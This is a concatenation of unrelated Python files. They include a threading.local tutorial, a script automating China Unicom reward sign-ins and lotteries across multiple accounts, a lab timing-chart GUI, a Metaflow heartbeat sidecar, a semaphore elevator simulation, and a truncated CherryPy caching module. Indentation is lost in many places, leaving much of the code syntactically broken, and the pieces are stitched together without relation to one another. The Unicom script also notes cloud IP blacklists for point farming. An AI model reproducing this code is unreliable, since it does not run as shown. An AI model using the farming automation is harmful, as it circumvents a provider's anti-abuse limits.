    std = Student(name)
    # put std into the global dict, keyed by the current thread:
    global_dict[threading.current_thread()] = std
do_task_1()
do_task_2()
def do_task_1():
    # don't pass std in; look it up from the current thread instead:
std = global_dict[threading.current_thread()]
def do_task_2():
    # any function can look up the current thread's std variable:
std = global_dict[threading.current_thread()]
print '-------ThreadLocal-------'
import threading
# create a global ThreadLocal object:
local_school = threading.local()
def process_student():
print 'Hello, %s (in %s)' % (local_school.student1, threading.current_thread().name)
def process_thread(name):
    # bind the ThreadLocal student:
local_school.student1 = name
process_student()
t1 = threading.Thread(target=process_thread, args=('Alice',), name='Thread-A')
t2 = threading.Thread(target=process_thread, args=('Bob',), name='Thread-B')
t1.start()
t2.start()
t1.join()
t2.join()
# local_school.student is a thread-local variable: each thread reads and writes its
# own copy without interfering with other threads and without any locking; ThreadLocal
# handles that internally. Its most common use is to bind each thread its own
# database connection, HTTP request, user identity, and so on.
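# A short sketch of the per-thread resource pattern described above; the
# DummyConnection class is only a stand-in for a real database connection.
class DummyConnection(object):
    def __init__(self, name):
        self.name = name
resource_local = threading.local()
def handle_request(name):
    # each thread binds its own connection; other threads never see it
    resource_local.connection = DummyConnection(name)
    return do_query()
def do_query():
    # any function running on this thread can fetch the bound connection directly
    return resource_local.connection.name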
# CPU-bound vs. IO-bound tasks
# Running multiple tasks in a single process / single thread is a new model
# called the event-driven model.
# Nginx is a web server that supports asynchronous IO.
# Coroutines: an asynchronous programming model within a single process.
print '-------Distributed processes-------'
# https://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000/001386832973658c780d8bfa4c6406f83b2b3097aed5df6000
# not covered yet
|
index.py
|
# -*- coding: utf8 -*-
import time
from threading import Thread
from activity.unicom.dailySign import SigninApp
from activity.unicom.integralTask import IntegralTask
from activity.unicom.watchAddFlow import WatchAddFlow
from activity.unicom.superSimpleTask import SuperSimpleTask
from activity.unicom.unicomTurnCard import TurnCard
from activity.unicom.unicomTurnTable import TurnTable
from activity.unicom.unicomZhuaWaWa import ZhuaWaWa
from activity.unicom.sheggMachine import SheggMachine
from activity.unicom.blindBox import BlindBox
from activity.unicom.unicomSignerTask import SignerTask
from activity.unicom.zhuanjifenWeiBo import ZJFWeiBo
from activity.woread.luckdraw import LuckDraw
from activity.woread.openbook import OpenBook
from activity.woread.readluchdraw import ReadLuchDraw
from activity.woread.thanksgiving import ThanksGiving
from activity.woread.prizedetail import Prize
from activity.wolearn.zsmh import ZSMHAct
from activity.wolearn.xxdgg import XxdggAct
from activity.wolearn.wabao import WzsbzAct
from activity.wolearn.wmms2 import BxwmAct
from activity.wolearn.stdt5 import Stdthd
from activity.womail.dailyTask import DailySign
from activity.womail.scratchable import Scratchable
from activity.womail.puzzle2 import Puzzle2
from activity.push.pushlog import PushLog
def Template(cls):
    # China Unicom phone number / service password configuration (multiple accounts supported)
ts = []
for mobile, password in [
        # ('phone number', 'service password'),
        # ('phone number', 'service password'),
]:
ts.append(Thread(target=cls(mobile, password).run))
for t in ts:
t.start()
for t in ts:
t.join()
def WXTemplate(cls):
    # WeChat Wo Mail mobile/openId configuration (multiple accounts supported)
ts = []
for item in [
# {
# "mobile": "xxx",
# "openId": "xxx"
# },
# {
# "mobile": "xxx",
# "openId": "xxx"
# },
]:
ts.append(Thread(target=cls(**item).run))
for t in ts:
t.start()
for t in ts:
t.join()
def PushTemplate():
    # Message push (reads the logs recorded by the data storage service and pushes them)
    # Push settings are in utils/config.py
    # Fill in the accounts that take part in the activity tasks
    # Leave this empty if you don't need push notifications
PushLog([
# "联通手机号-1",
# "联通手机号-2",
# "沃邮箱mobile-1",
# "沃邮箱mobile-2",
]).run()
def main_handler(event=None, context=None):
"""
    Runs as a Tencent Cloud Function every 15 minutes.
"""
now_time = int(time.strftime(
'%H%M',
time.localtime(time.time() + 8 * 60 * 60 + time.timezone)
))
DEBUG = False
    # Wo Read activities
    if now_time in range(600, 800) or DEBUG:  # 7 runs
Template(LuckDraw)
Template(OpenBook)
    if now_time in range(600, 730) or DEBUG:  # 5 runs
Template(ThanksGiving)
    if now_time in range(800, 830) or DEBUG:  # 1 run
Template(ReadLuchDraw)
    if now_time in range(830, 900) or DEBUG:  # auto-claim prizes
Template(Prize)
    # Wo Learn activities
if now_time in range(900, 1100) or DEBUG:
Template(ZSMHAct) # 7
Template(XxdggAct) # 8
Template(WzsbzAct) # 6
Template(BxwmAct) # 5
if now_time in range(900, 930) or DEBUG:
Template(Stdthd)
    # Wo Mail activities
if now_time in range(1000, 1010) or now_time in range(1300, 1310) or DEBUG:
WXTemplate(DailySign)
WXTemplate(Puzzle2)
WXTemplate(Scratchable)
# ----------------------------------------------------------------
    # Use Huawei Cloud function workflows here (Tencent Cloud Function and
    # Alibaba Function Compute IPs are blacklisted for earning points)
    # Unicom daily sign-in
if now_time in range(800, 830) or now_time in range(1130, 1200) or now_time in range(1530, 1600) or DEBUG:
Template(SigninApp)
    # Unicom sign-in page: watch videos to earn extra data
if now_time in range(800, 900) or DEBUG:
Template(WatchAddFlow)
    # Earn-points takeout and shopping tasks
if now_time in range(900, 930) or DEBUG:
Template(SignerTask)
Template(ZJFWeiBo)
    # Unicom sign-in page points tasks
if now_time in range(800, 1600) or DEBUG:
Template(SuperSimpleTask)
    # Unicom points-doubling tasks
if now_time in range(800, 1000) or DEBUG:
Template(IntegralTask)
    # Unicom sign-in page wheel and card-draw tasks
if now_time in range(900, 1100) or DEBUG:
Template(SheggMachine)
Template(BlindBox)
Template(TurnCard)
Template(TurnTable)
Template(ZhuaWaWa)
    # Message push
if now_time in range(1130, 1140) or now_time in range(1530, 1540) or DEBUG:
PushTemplate()
|
TimingStability.py
|
"""
Analyzes Lauecollect logfiles and generates a chart of the
history of the timing error.
Author: Friedrich Schotte, NIH, 7 Jun 2010 - 4 Feb 2017
"""
from numpy import *
import wx
from logging import debug,info,warn,error
__version__ = "2.5" # separate timing logfile
class TimingStabilityChart (wx.Frame):
def __init__(self):
wx.Frame.__init__(self,parent=None)
self.title = "Laser to X-ray Timing"
# Menus
menuBar = wx.MenuBar()
menu = wx.Menu()
menu.Append (101,"Watch directory...\tCtrl+O",
"Select top level folder containig all log files to watch.")
self.Bind (wx.EVT_MENU,self.SelectToplevelDir,id=101)
menu.Append (112,"&Save As...","Creates text file with numerical data.")
self.Bind (wx.EVT_MENU,self.OnSave,id=112)
menu.Append (121,"E&xit","Closes this window.")
self.Bind (wx.EVT_MENU,self.OnExit,id=121)
menuBar.Append (menu,"&File")
self.Bind(wx.EVT_CLOSE,self.OnExit)
menu = wx.Menu()
menu.Append (402,"&Options...","Parameters")
self.Bind (wx.EVT_MENU,self.OnOptions,id=402)
menuBar.Append (menu,"&Options")
menu = wx.Menu()
menu.Append (501,"&About...","Version information")
self.Bind (wx.EVT_MENU,self.OnAbout,id=501)
menuBar.Append (menu,"&Help")
self.SetMenuBar (menuBar)
# Controls
from matplotlib.figure import Figure
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg
self.figure = Figure(figsize=(4,3))
self.canvas = FigureCanvasWxAgg(self,-1,self.figure)
self.figure.subplots_adjust(bottom=0.2)
self.plot = self.figure.add_subplot(1,1,1)
self.liveControl = wx.CheckBox(self,label="Live")
self.Bind(wx.EVT_CHECKBOX,self.OnLive,self.liveControl)
self.slider = wx.Slider(self)
self.Bind(wx.EVT_SLIDER,self.OnSlider)
self.CreateStatusBar()
# Layout
vbox = wx.BoxSizer(wx.VERTICAL)
vbox.Add(self.canvas,proportion=1,flag=wx.EXPAND)
hbox = wx.BoxSizer(wx.HORIZONTAL)
flag = wx.ALIGN_CENTRE_VERTICAL|wx.ALL
hbox.Add(self.liveControl,proportion=0,flag=flag,border=5)
hbox.Add(self.slider,proportion=1,flag=wx.EXPAND)
vbox.Add(hbox,proportion=0,flag=wx.EXPAND)
self.SetSizer(vbox)
self.Fit()
# Default settings.
global toplevel_dir
toplevel_dir = "//mx340hs/data/anfinrud_1702/Data/WAXS"
self.export_filename = "//mx340hs/data/anfinrud_1702/Logfiles/Timing Stability.txt"
self.timepoints = []
self.max_dt = +400e-12
self.min_dt = -400e-12
self.Size = 640,480
self.update_interval = 10 # seconds
# Initialization
# Restore last saved settings.
self.config_dir = wx.StandardPaths.Get().GetUserDataDir()+\
"/TimingStability"
self.config = wx.FileConfig(localFilename=self.config_dir+"/settings.py")
self.settings = "timepoints","max_dt","min_dt","Size","export_filename",\
"live","update_interval"
for name in self.settings:
try: setattr(self,name,eval(self.config.Read(name)))
except: pass
try: toplevel_dir = eval(self.config.Read('toplevel_dir'))
except: pass
try: self.slider.Value = eval(self.config.Read('fraction'))
except: pass
# Restore window position.
try:
x,y = eval(self.config.Read('Position'))
if x >= 0 and y >= 0: self.Position = x,y
except: pass
self.Show()
# Initialization
self.npoints = 0
from threading import Thread
self.update_task = Thread(target=read_logfiles,name="read_logfiles")
self.update()
def update(self,event=None):
# Do some work.
from time import time
        # Relaunch the background update task after it is done, after waiting
        # the specified time given by 'update_interval'.
if self.live and not self.update_task.isAlive() and \
time()-update_completed > self.update_interval:
from threading import Thread
global cancelled; cancelled = False
self.update_task = Thread(target=read_logfiles,name="read_logfiles")
self.update_task.start()
self.refresh()
# Relaunch yourself.
self.timer = wx.Timer(self)
self.Bind (wx.EVT_TIMER,self.update)
self.timer.Start(1000,oneShot=True)
def refresh(self,event=None):
"Generate the plot"
# Update window title.
self.SetTitle(self.title+" - "+toplevel_dir)
# Update the chart.
if len(data.t) != self.npoints: self.refresh_chart()
self.npoints = len(data.t)
# Update status bar.
text = str(self.GetStatusBar().GetStatusText()).replace('\x00','')
if text == "" or "..." in text: self.SetStatusText(status)
def refresh_chart(self):
# Generate a chart.
from pylab import setp,date2num,DateFormatter
from datetime import datetime
t,act_delay,nom_delay = data.t,data.act_delay,data.nom_delay
global date,dt # for debugging
date = array([date2num(datetime.fromtimestamp(x)) for x in t])
dt = act_delay - nom_delay
# Filter the data to be plotted.
# Timepoints > 1us cannot be measured reliably.
##dt[abs(nom_delay) > 1e-6] = nan
# If specified, show only the timing error for selected time points.
if len(self.timepoints) > 0:
for timepoint in self.timepoints:
dt[abs(nom_delay-timepoint) > 10e-12] = nan
self.figure.subplots_adjust(bottom=0.2)
self.plot = self.figure.add_subplot(1,1,1)
self.plot.clear()
self.plot.set_xlabel("time")
self.plot.xaxis_date()
formatter = DateFormatter('%b %d %H:%M')
self.plot.xaxis.set_major_formatter(formatter)
setp(self.plot.get_xticklabels(),rotation=90,fontsize=10)
self.plot.set_ylabel("timing error [ps]")
self.plot.grid()
if not all(isnan(dt)):
order = argsort(date)
self.plot.plot(date[order],dt[order]/1e-12,'.')
# Restrict the time range plotted according to the slider.
tmin,tmax = amin(date[~isnan(dt)]),amax(date[~isnan(dt)])
fraction = 1-self.slider.GetValue()/100.
tmin = tmax - fraction*(tmax-tmin)
self.plot.set_xlim(tmin,tmax)
if not isnan(self.min_dt): self.plot.set_ylim(ymin=self.min_dt/1e-12)
if not isnan(self.max_dt): self.plot.set_ylim(ymax=self.max_dt/1e-12)
self.canvas.draw()
def get_data(self):
"""Date and time error as tuple of two numpy arrays.
Returns (t,dt)
t: number of seconds since 1 Jan 1970 00:00:00 UTC as floating point
value.
dt: Laser to X-ray timing error in seconds
"""
from pylab import date2num
from datetime import datetime
t,act_delay,nom_delay = data.t,data.act_delay,data.nom_delay
dt = act_delay - nom_delay
# Filter the data to be plotted.
selected = ~isnan(dt)
# Timepoints > 1us cannot be measured reliably.
selected &= (abs(nom_delay) <= 1e-6)
# If specified, show only the timing error for selected time points.
if len(self.timepoints) > 0:
for timepoint in self.timepoints:
selected &= (abs(nom_delay-timepoint) <= 10e-12)
t = t[selected]; dt = dt[selected]
if not all(isnan(dt)):
order = argsort(t)
t = t[order]
dt = dt[order]
# Restrict the time range plotted according to the slider.
tmin,tmax = amin(t[~isnan(dt)]),amax(t[~isnan(dt)])
fraction = 1-self.slider.GetValue()/100.
tmin = tmax - fraction*(tmax-tmin)
        selected = (tmin <= t) & (t <= tmax)
t = t[selected]
dt = dt[selected]
return t,dt
data = property(get_data)
def SelectToplevelDir(self,event):
"""Called from menu File/Watch Directory...
Let the user pick the directory which contains all the log files to watch.
"""
global toplevel_dir
dlg = wx.DirDialog(self, "Where to look for Lauecollect log files:",
style=wx.DD_DEFAULT_STYLE)
dlg.SetPath(toplevel_dir)
# ShowModal pops up a dialog box and returns control only after the user
# has selects OK or Cancel.
OK = (dlg.ShowModal() == wx.ID_OK)
dlg.Destroy()
if not OK: return
toplevel_dir = str(dlg.GetPath())
self.SaveSettings()
reset()
global update_completed; update_completed = 0
def OnSave(self,event):
"Called from menu File/Save As..."
from os.path import dirname,basename
from inspect import getfile
filename = self.export_filename
dlg = wx.FileDialog(self,"Save Displayed Data Points As",
style=wx.SAVE|wx.OVERWRITE_PROMPT,
defaultFile=basename(filename),defaultDir=dirname(filename),
wildcard="Text Files (*.txt)|*.txt|All Files (*.*)|*.*")
if dlg.ShowModal() == wx.ID_OK:
filename = dlg.GetPath()
header = "X-ray to laser timing error recorded by Lauecollect\n"
modulename = getfile(lambda x: None)
header += "Generated by "+basename(modulename)+" "+__version__+"\n"
header += "Filtered, including only these timepoints: "
for t in self.timepoints: header += time_string(t)+", "
header = header.rstrip(", ")
if len(self.timepoints) == 0: header += "all <= 1 us"
labels="date time,dt[s]"
t,dt = self.data
date_time = map(datestring,t)
from textfile import save
save ([date_time,dt],filename,header,labels)
self.export_filename = filename
dlg.Destroy()
def OnExit(self,event):
"Called on File/Exit or when the windows's close button is clicked"
self.SaveSettings()
self.Destroy()
def OnOptions(self,event):
"Change parameters controlling the centering procedure."
dlg = Options(self)
dlg.CenterOnParent()
dlg.Show()
def OnAbout(self,event):
"Called from the Help/About"
from os.path import basename
from inspect import getfile
filename = getfile(lambda x: None)
info = basename(filename)+" "+__version__+"\n"+__doc__
dlg = wx.MessageDialog(self,info,"About",wx.OK|wx.ICON_INFORMATION)
dlg.CenterOnParent()
dlg.ShowModal()
dlg.Destroy()
def OnSlider(self,event):
self.refresh_chart()
def OnLive(self,event):
"called when 'Active' buttoin is toggled"
global cancelled,update_completed
cancelled = not self.liveControl.Value
if self.liveControl.Value == True: update_completed = 0
def get_live(self):
"Is 'Live' checkbox checked?"
return self.liveControl.Value
def set_live(self,value): self.liveControl.Value = value
live = property(get_live,set_live)
def SaveSettings(self):
# Save settings for next time.
from os.path import exists
from os import makedirs
if not exists(self.config_dir): makedirs(self.config_dir)
for name in self.settings:
self.config.Write (name,repr(getattr(self,name)))
self.config.Write ("toplevel_dir",repr(toplevel_dir))
self.config.Write ("fraction",repr(self.slider.Value))
self.config.Write ("Position",repr(self.Position))
self.config.Flush()
class Options (wx.Dialog):
"Allows the use to configure camera properties"
def __init__ (self,parent):
wx.Dialog.__init__(self,parent,-1,"Beam Centering Options")
# Controls
style = wx.TE_PROCESS_ENTER
self.Timepoints = wx.TextCtrl (self,size=(80,-1),style=style)
self.Max = wx.TextCtrl (self,size=(80,-1),style=style)
self.Min = wx.TextCtrl (self,size=(80,-1),style=style)
self.UpdateInterval = wx.TextCtrl (self,size=(80,-1),style=style)
self.Bind (wx.EVT_TEXT_ENTER,self.OnEnter)
# Layout
layout = wx.BoxSizer()
grid = wx.FlexGridSizer (cols=2,hgap=5,vgap=5)
flag = wx.ALIGN_CENTER_VERTICAL
label = "Filter chart, including only these timepoints:"
grid.Add (wx.StaticText(self,label=label),flag=flag)
grid.Add (self.Timepoints,flag=flag)
label = "Vertical scale upper limit:"
grid.Add (wx.StaticText(self,label=label),flag=flag)
grid.Add (self.Max,flag=flag)
label = "Vertical scale lower limit:"
grid.Add (wx.StaticText(self,label=label),flag=flag)
grid.Add (self.Min,flag=flag)
label = "Update Interval:"
grid.Add (wx.StaticText(self,label=label),flag=flag)
grid.Add (self.UpdateInterval,flag=flag)
# Leave a 10-pixel wide space around the panel.
layout.Add (grid,flag=wx.EXPAND|wx.ALL,border=10)
self.SetSizer(layout)
self.Fit()
self.update()
def update(self):
parent = self.Parent
timepoints = ""
for t in parent.timepoints: timepoints += time_string(t)+","
timepoints = timepoints.strip(",")
self.Timepoints.Value = timepoints
self.Min.Value = time_string(self.Parent.min_dt).replace("off","auto")
self.Max.Value = time_string(self.Parent.max_dt).replace("off","auto")
self.UpdateInterval.Value = time_string(self.Parent.update_interval)
def OnEnter(self,event):
text = self.Timepoints.Value
self.Parent.timepoints = \
[seconds(t) for t in text.split(",") if not isnan(seconds(t))]
self.Parent.min_dt = seconds(self.Min.Value)
self.Parent.max_dt = seconds(self.Max.Value)
self.Parent.update_interval = seconds(self.UpdateInterval.Value)
self.update()
self.Parent.refresh_chart()
toplevel_dir = "//mx340hs/data/anfinrud_1702/Data/WAXS"
class data:
t = zeros(0)
nom_delay = zeros(0)
act_delay = zeros(0)
status = ""
cancelled = False
update_completed = 0
logfiles = {}
timestamps = {}
def read_logfiles():
from table import table
from os.path import basename,getmtime
from time import time
global status,update_completed
status = "Searching for logfiles..."
filenames = logfilenames(toplevel_dir)
for filename in filenames:
if cancelled: break
# Read a file only if it has not been read before or if it was
# modified after it was read.
if filename in timestamps and timestamps[filename] == getmtime(filename):
continue
timestamps[filename] = getmtime(filename)
status = "Reading %s..." % basename(filename)
try:
logfiles[filename] = table(filename,separator="\t")
update_data()
        except Exception as msg: warn("Skipping %s: %s" % (filename,msg)); continue
status = ""
update_completed = time()
def reset():
global logfiles,timestamps
logfiles = {}
timestamps = {}
data.t = data.act_delay = data.nom_delay = zeros(0)
def update_data():
from time_string import timestamp
status = "Merging..."
t = nom_delay = act_delay = zeros(0)
for logfile in logfiles.values():
t = concatenate((t,[timestamp(d,"") for d in logfile.date_time]))
nom_delay = concatenate((nom_delay,map(filename_delay,logfile["filename"])))
act_delay = concatenate((act_delay,logfile.act_delay))
data.t,data.act_delay,data.nom_delay = t,act_delay,nom_delay
def filename_delay(filename):
"""Decode image filename and extract delay
e.g. "AlCl3-2_1_90C_-10us-3.mccd" -> -10e-6"""
from time_string import seconds
delay = filename.replace(".mccd","")
delay = delay.split("_")[-1]
    if delay.startswith("-"): delay = delay[1:]; sign = "-"
    else: sign = "" # positive delays carry no sign in the filename
delay = delay.split("-")[0]
delay = sign+delay
delay = seconds(delay)
return delay
def logfilenames(toplevel_dir):
"""List of the pathnames of all Lauecollect logfiles in 'toplevel_dir'
and subdirectories."""
from os import walk
logfiles = []
for (dirpath,dirnames,filenames) in walk(toplevel_dir):
if cancelled: return logfiles
for filename in filenames:
filename = dirpath+"/"+filename
if not filename.endswith("_timing.txt"): continue
logfiles += [filename]
return logfiles
def timestamp(date_time):
"Convert a date string to number of seconds til 1 Jan 1970."
from time import strptime,mktime
return mktime(strptime(date_time,"%d-%b-%y %H:%M:%S"))
def datestring(seconds):
"""Format time in seconds since 1 Jan 1970 00:00 UST as local time string
in the format '1-Jan-70 00:00:00'"""
from datetime import datetime
from time import strftime,localtime
return strftime("%d-%b-%y %H:%M:%S",localtime(seconds))
def time_string(t):
"""Convert time given in seconds in more readable format
such as ps, ns, ms, s, min, hours and days."""
if t == "off": return "off"
try: t = float(t)
except: return "off"
if t != t: return "off" # not a number
if t == 0: return "0"
if abs(t) < 0.5e-12: return "0"
if abs(t) < 999e-12: return "%.3gps" % (t*1e12)
if abs(t) < 999e-9: return "%.3gns" % (t*1e9)
if abs(t) < 999e-6: return "%.3gus" % (t*1e6)
if abs(t) < 999e-3: return "%.3gms" % (t*1e3)
if abs(t) <= 59: return "%.3gs" % t
if abs(t) <= 3600-1: return "%02d:%02dmin" % (t/60,round(t%60))
if abs(t) <= 24*3600-1: return "%d:%02dh" % (round(t/3600),round(t%3600/60))
return str(int(t/(24*3600)))+"d "+str(int(round(t%(24*3600)/3600)))+"h"
def seconds (text):
""" convert a text string like "10ns" into a floating point value in seconds.
Units accepted are "s","ms", "us", "ns", "ps" "min", "hour" ("h") """
from numpy import nan
text = text.replace("hours","*3600")
text = text.replace("hour","*3600")
text = text.replace("h","*3600")
text = text.replace("min","*60")
text = text.replace("s","")
text = text.replace("m","*1e-3")
text = text.replace("u","*1e-6")
text = text.replace("n","*1e-9")
text = text.replace("p","*1e-12")
try: return float(eval(text))
except: return nan
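# A worked example of the substitution-and-eval parsing above (illustrative):
#   seconds("10ns")  : the trailing "s" is stripped -> "10n", then "n" becomes
#                      "*1e-9", so eval("10*1e-9") == 1e-08
#   seconds("-10us") : "-10us" -> "-10u" -> "-10*1e-6" -> eval -> -1e-05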
def repr(x):
"""Replacement for built-in function 'repr'.
Fixes Microsoft quirk nan -> '1.#QNAN' or '1.#IND'. inf -> '1.#INF'"""
if issubclass(type(x),float):
if isnan(x): return "nan"
if isinf(x) and x>0: return "inf"
if isinf(x) and x<0: return "-inf"
return __builtins__.repr(x)
def main():
global win
if not hasattr(wx,"app"): wx.app = wx.App(redirect=False)
win = TimingStabilityChart()
wx.app.MainLoop()
if __name__ == "__main__":
"""Main program"""
main()
##from thread import start_new_thread
##start_new_thread (main,()) # use for debugging
|
heartbeat.py
|
import time
import requests
import json
from threading import Thread
from metaflow.sidecar_messages import MessageTypes, Message
from metaflow.metaflow_config import METADATA_SERVICE_HEADERS
from metaflow.exception import MetaflowException
HB_URL_KEY = 'hb_url'
class HeartBeatException(MetaflowException):
headline = 'Metaflow heart beat error'
def __init__(self, msg):
super(HeartBeatException, self).__init__(msg)
class MetadataHeartBeat(object):
def __init__(self):
self.headers = METADATA_SERVICE_HEADERS
self.req_thread = Thread(target=self.ping)
self.req_thread.daemon = True
self.default_frequency_secs = 10
self.hb_url = None
def process_message(self, msg):
# type: (Message) -> None
if msg.msg_type == MessageTypes.SHUTDOWN:
            # TODO: shutdown doesn't do anything yet; should it still be called?
self.shutdown()
if (not self.req_thread.is_alive()) and \
msg.msg_type == MessageTypes.LOG_EVENT:
# set post url
self.hb_url = msg.payload[HB_URL_KEY]
# start thread
self.req_thread.start()
def ping(self):
retry_counter = 0
while True:
try:
frequency_secs = self.heartbeat()
if frequency_secs is None or frequency_secs <= 0:
frequency_secs = self.default_frequency_secs
time.sleep(frequency_secs)
retry_counter = 0
except HeartBeatException as e:
retry_counter = retry_counter + 1
time.sleep(4**retry_counter)
def heartbeat(self):
if self.hb_url is not None:
response = \
requests.post(url=self.hb_url, data='{}', headers=self.headers)
# Unfortunately, response.json() returns a string that we need
# to cast to json; however when the request encounters an error
# the return type is a json blob :/
if response.status_code == 200:
return json.loads(response.json()).get('wait_time_in_seconds')
else:
raise HeartBeatException('HeartBeat request (%s) failed'
' (code %s): %s' %
(self.hb_url, response.status_code,
response.text))
return None
def shutdown(self):
# attempts sending one last heartbeat
self.heartbeat()
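# A minimal usage sketch (hypothetical driver code; the exact Message
# constructor arguments below are assumptions for illustration, not taken
# from metaflow.sidecar_messages):
#
#   hb = MetadataHeartBeat()
#   hb.process_message(Message(MessageTypes.LOG_EVENT, {HB_URL_KEY: hb_url}))
#   ...  # heartbeats now run on the background thread roughly every 10 seconds
#   hb.process_message(Message(MessageTypes.SHUTDOWN, None))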
|
elevador.py
|
#!/usr/bin/python3
from threading import Semaphore, Thread
from time import sleep
from random import random, choice
from termcolor import cprint, colored
freq_elev = 1 # Frequency (in seconds) at which the elevator advances
freq_alum = 0.1 # Frequency (in seconds) at which a new student arrives
demora_puerta = 0.01 # My solution is bad! I had to add a delay
                     # at the door to force the turn
                     # to be "passed on"
#
carga_max = 5 # How many students fit in the elevator?
multiplex = Semaphore(carga_max) # Ensures no more enter than fit
pisos = [0,1,2,3,4] # List of defined floors
mut_colas = Semaphore(1) # One semaphore per queue so the elevator can wake the threads
                         # as it passes each floor
colas = {} # Lists of students queued on each of the floors
puerta = Semaphore(1) # Exclusive use of the "door" (to track how many are inside)
a_bordo = {} # Lists of threads that are on board, grouped by destination floor
# The queues for waiting for the elevator and for getting off the
# elevator: one queue per floor. To board the elevator, each queue
# has an associated semaphore.
for i in pisos:
colas[i] = {'num': 0, 'sem': Semaphore(0)}
a_bordo[i] = []
def elevador():
    '''The elevator is the only thread that stays alive for the entire
    lifetime of the system. It goes up and down the floors hoping to find
    students (what poor energy efficiency!), waking up whichever
    students are needed.
    '''
piso_actual = 0
direccion = True # True = ↑, False = ↓
while True:
        # First: advance to the next floor
piso_prev = piso_actual
sleep(freq_elev)
        # Handle the end stops: change direction when reaching the end
        # of the run
if (direccion and piso_actual >= pisos[-1]) or (not direccion and piso_actual <= pisos[0]):
direccion = not direccion
        # Advance in the corresponding direction
if direccion:
piso_actual += 1
else:
piso_actual -= 1
cprint('E: %d ⇒ %d' % (piso_prev, piso_actual), 'yellow')
        # Show the global state of the system only when piso==0 (to avoid flooding the output)
if piso_actual == 0:
estado_global()
        # Before letting anyone in, let people out: does anyone need to get off?
puerta.acquire()
while len(a_bordo[piso_actual]) > 0:
            # Take the student out of the destination queue and wake them up gently
alum = a_bordo[piso_actual].pop()
alum.release()
        # If there are students queued on this floor, wake up as many as possible
mut_colas.acquire()
cprint(' %d alumnos formados, %d a bordo' % (colas[piso_actual]['num'], carga_total()), 'yellow')
while carga_total() < carga_max and colas[piso_actual]['num'] > 0:
colas[piso_actual]['sem'].release()
colas[piso_actual]['num'] -= 1
sleep(demora_puerta)
if carga_total() > carga_max:
cprint('Algo anda mal, muy mal. Carga total == %d' % carga_total(), 'yellow', 'on_red')
sleep(1)
puerta.release()
mut_colas.release()
def alumno(num):
    '''Represents each of the students. It picks a random origin and
    destination floor, joins the corresponding queue and goes to
    sleep. When woken up, it boards the elevator and goes back to
    sleep. And when it wakes up again, that is the sign it has arrived!
    '''
desde = choice(pisos)
hacia = choice(pisos)
cprint('A%d: %d ⇒ %d' % (num, desde, hacia), 'green')
if desde == hacia:
cprint('A%d: Estoy donde quiero estar :-P' % (num), 'green')
return True # Nada que hacer!
# Se "apunta" en la cola que le corresponde y espera al elevador
mut_colas.acquire()
cprint(' A%d: A la cola %d (somos %d)' % (num, desde, colas[desde]['num']), 'green')
colas[desde]['num'] += 1
mut_colas.release()
colas[desde]['sem'].acquire()
    # The elevator is here. Get on.
cprint(' A%d. Tomo elevador %d → %d' % (num, desde, hacia), 'green')
subir_elevador(num, hacia)
    # We have reached our destination. Get off.
cprint(' A%d. ¡Gracias elevador! 😉' % num, 'green')
multiplex.release()
def subir_elevador(num, dest):
    '''To board the elevator, a student adds a semaphore to the
    corresponding queue and sleeps waiting for its arrival.
    '''
multiplex.acquire()
mi_dest = Semaphore(0)
cprint('¡Pásele %d!' % (num), 'cyan')
puerta.acquire()
a_bordo[dest].append(mi_dest)
puerta.release()
mi_dest.acquire()
def carga_total():
    '''Reports the total load the elevator is carrying at a given moment.
    To give consistent results, the caller is assumed to hold the
    puerta mutex.
    '''
tot = 0
for i in pisos:
tot += len(a_bordo[i])
return tot
def espera_total():
    '''Reports the total number of students waiting for the elevator.
    To give consistent results, the caller is assumed to hold the
    puerta mutex.
    '''
tot = 0
for i in pisos:
tot += colas[i]['num']
return tot
def estado_global():
    '''
    Reports the global state of the system: how many students are queued in each queue
    '''
puerta.acquire()
carga = carga_total()
espera = espera_total()
cprint('===== Estado global del sistema: =====', 'white', 'on_blue')
cprint('%d esperando por el elevador:' % (espera), 'green', 'on_blue')
cprint("\t".join(' %d: %d' % (i, colas[i]['num']) for i in pisos), 'green', 'on_blue')
cprint('A bordo (quedan %d lugares):' % (carga_max - carga), 'yellow', 'on_blue')
cprint("\t".join(' %d: %d' % (i, len(a_bordo[i])) for i in pisos), 'yellow', 'on_blue')
puerta.release()
Thread(target=elevador).start()
num = 0
while True:
num += 1
Thread(target=alumno, args=[num]).start()
sleep(freq_alum)
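# Illustrative console output of a short run (colours omitted; the actual
# student and floor numbers vary from run to run):
#
#   A1: 3 ⇒ 0
#    A1: A la cola 3 (somos 0)
#   E: 0 ⇒ 1
#    0 alumnos formados, 0 a bordo
#   ...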
|
caching.py
|
"""
CherryPy implements a simple caching system as a pluggable Tool. This tool
tries to be an (in-process) HTTP/1.1-compliant cache. It's not quite there
yet, but it's probably good enough for most sites.
In general, GET responses are cached (along with selecting headers) and, if
another request arrives for the same resource, the caching Tool will return 304
Not Modified if possible, or serve the cached response otherwise. It also sets
request.cached to True if serving a cached representation, and sets
request.cacheable to False (so it doesn't get cached again).
If POST, PUT, or DELETE requests are made for a cached resource, they
invalidate (delete) any cached response.
Usage
=====
Configuration file example::
[/]
tools.caching.on = True
tools.caching.delay = 3600
You may use a class other than the default
:class:`MemoryCache<cherrypy.lib.caching.MemoryCache>` by supplying the config
entry ``cache_class``; supply the full dotted name of the replacement class
as the config value. It must implement the basic methods ``get``, ``put``,
``delete``, and ``clear``.
You may set any attribute, including overriding methods, on the cache
instance by providing them in config. The above sets the
:attr:`delay<cherrypy.lib.caching.MemoryCache.delay>` attribute, for example.
"""
import datetime
import sys
import threading
import time
import six
import cherrypy
from cherrypy.lib import cptools, httputil
from cherrypy._cpcompat import ntob, Event
class Cache(object):
"""Base class for Cache implementations."""
def get(self):
"""Return the current variant if in the cache, else None."""
        raise NotImplementedError
def put(self, obj, size):
"""Store the current variant in the cache."""
        raise NotImplementedError
def delete(self):
"""Remove ALL cached variants of the current resource."""
        raise NotImplementedError
def clear(self):
"""Reset the cache to its initial, empty state."""
        raise NotImplementedError
# ------------------------------ Memory Cache ------------------------------- #
class AntiStampedeCache(dict):
"""A storage system for cached items which reduces stampede collisions."""
def wait(self, key, timeout=5, debug=False):
"""Return the cached value for the given key, or None.
If timeout is not None, and the value is already
being calculated by another thread, wait until the given timeout has
elapsed. If the value is available before the timeout expires, it is
        returned. If not, None is returned, and a sentinel is placed in the cache
to signal other threads to wait.
If timeout is None, no waiting is performed nor sentinels used.
"""
value = self.get(key)
if isinstance(value, Event):
if timeout is None:
# Ignore the other thread and recalc it ourselves.
